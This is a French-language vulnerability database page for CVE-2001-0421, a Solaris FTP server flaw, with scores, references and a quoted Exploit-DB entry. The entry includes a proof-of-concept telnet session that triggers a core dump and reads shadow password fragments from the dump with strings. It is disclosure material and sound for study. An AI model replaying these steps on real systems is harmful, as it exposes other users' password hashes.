CVE-2001-0421 : Détail

CVE-2001-0421

2.65%V3
Network
2001-05-24
02h00 +00:00
2002-02-11
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

FTP server in Solaris 8 and earlier allows local and remote attackers to cause a core dump in the root directory, possibly with world-readable permissions, by providing a valid username with an invalid password followed by a CWD ~ command, which could release sensitive information such as shadowed passwords, or fill the disk partition.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.4 AV:N/AC:L/Au:N/C:P/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 20764

Date de publication : 2001-04-16 22h00 +00:00
Auteur : warning3
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/2601/info Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server. A problem in the ftp server included with the Solaris Operating System could allow a local user to recover parts of the shadow file, containing encrypted passwords. Due to a previously known problem involving a buffer overflow in glob(), it is possible to cause a buffer overflow in the Solaris ftp server, which will dump parts of the shadow file to core. This can be done with the CWD ~ command, using a non-standard ftp client. Therefore, a local user could cause a buffer overflow in the ftp server, and upon reading the core file, recover passwords for other local users, potentially gaining elevated privileges. [root@ /usr/sbin]> telnet localhost 21 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 sun26 FTP server (SunOS 5.6) ready. user warning3 331 Password required for warning3. <-- a valid username pass blahblah <--- a wrong password 530 Login incorrect. CWD ~ 530 Please login with USER and PASS. Connection closed by foreign host. [root@ /usr/sbin]> ls -l /core -rw-r--r-- 1 root root 284304 Apr 16 10:20 /core [root@ /usr/sbin]> strings /core|more [...snip...] lp:NP:6445:::::: P:64 eH:::: uucp:NP:6445:::

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version 2.6

Sun>>Sunos >> Version To (including) 5.9

Références

http://www.securityfocus.com/archive/1/177200
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/2601
Tags : vdb-entry, x_refsource_BID